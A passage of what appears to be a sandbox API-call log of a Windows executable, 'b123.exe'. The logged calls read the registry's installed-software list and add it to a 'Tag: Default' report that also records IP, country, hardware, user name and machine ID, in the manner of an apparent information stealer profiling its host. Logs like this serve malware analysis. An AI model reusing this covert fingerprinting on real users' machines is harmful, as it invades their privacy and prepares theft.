C:\\Users\\RDhJ0CNFevzX\\Desktop\\b123.exe\n\nLocal Time: 23/3/2022 4:48:41\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508" [0235.131] RegQueryValueExA (in: hKey=0x384, lpValueName="DisplayVersion", lpReserved=0x0, lpType=0x1987c0, lpData=0x197bac, lpcbData=0x197fac*=0x400 | out: lpType=0x1987c0*=0x1, lpData="14.25.28508.3", lpcbData=0x197fac*=0xe) returned 0x0 [0235.131] lstrcatA (in: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\b123.exe\n\nLocal Time: 23/3/2022 4:48:41\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508", lpString2=" " | out: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\b123.exe\n\nLocal Time: 23/3/2022 4:48:41\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 ") returned="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\b123.exe\n\nLocal Time: 23/3/2022 4:48:41\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 " [0235.131] lstrcatA (in: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\b123.exe\n\nLocal Time: 23/3/2022 4:48:41\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 ", lpString2="14.25.28508.3" | out: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\b123.exe\n\nLocal Time: 23/3/2022 4:48:41\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3") returned="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\b123.exe\n\nLocal Time: 23/3/2022 4:48:41\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3" [0235.131] lstrcatA (in: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\b123.exe\n\nLocal Time: 23/3/2022 4:48:41\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3", lpString2="\n" | out: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\b123.exe\n\nLocal Time: 23/3/2022 4:48:41\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\n") returned="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\b123.exe\n\nLocal Time: 23/3/2022 4:48:41\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\n" [0235.131] RegCloseKey (hKey=0x384) returned 0x0 [0235.131] RegEnumKeyExA (in: hKey=0x388, dwIndex=0x1b, lpName=0x1983bc, lpcchName=0x197fac, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}", lpcchName=0x197fac, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0235.131] wsprintfA (in: param_1=0x197fbc, param_2="%s\\%s" | out: param_1="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}") returned 90 [0235.131] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}", ulOptions=0x0, samDesired=0x20019, phkResult=0x197fb8 | out: phkResult=0x197fb8*=0x384) returned 0x0 [0235.131] RegQueryValueExA (in: hKey=0x384, lpValueName="DisplayName", lpReserved=0x0, lpType=0x1987c0, lpData=0x197bac, lpcbData=0x197fac*=0x400 | out: lpType=0x1987c0*=0x1, lpData="Microsoft Visual C++ 2005 Redistributable", lpcbData=0x197fac*=0x2a) returned 0x0 [0235.132] lstrlenA (lpString="Microsoft Visual C++ 2005 Redistributable") returned 41 [0235.132] lstrcatA (in: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\b123.exe\n\nLocal Time: 23/3/2022 4:48:41\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\n", lpString2="Microsoft Visual C++ 2005 Redistributable" | out: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\b123.exe\n\nLocal Time: 23/3/2022 4:48:41\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable") returned="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\b123.exe\n\nLocal Time: 23/3/2022 4:48:41\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable" [0235.132] RegQueryValueExA (in: hKey=0x384, lpValueName="DisplayVersion", lpReserved=0x0, lpType=0x1987c0, lpData=0x197bac, lpcbData=0x197fac*=0x400 | out: lpType=0x1987c0*=0x1, lpData="8.0.61001", lpcbData=0x197fac*=0xa) returned 0x0 [0235.132] lstrcatA (in: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\b123.exe\n\nLocal Time: 23/3/2022 4:48:41\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable", lpString2=" " | out: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\b123.exe\n\nLocal Time: 23/3/2022 4:48:41\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable ") returned="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\b123.exe\n\nLocal Time: 23/3/2022 4:48:41\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable " [0235.132] lstrcatA (in: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\b123.exe\n\nLocal Time: 23/3/2022 4:48:41\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable ", lpString2="8.0.61001" | out: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\b123.exe\n\nLocal Time: 23/3/2022 4:48:41\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable 8.0.61001") returned="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\b123.exe\n\nLocal Time: 23/3/2022 4:48:41\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable 8.0.61001" [0235.132] lstrcatA (in: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\b123.exe\n\nLocal Time: 23/3/2022 4:48:41\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum 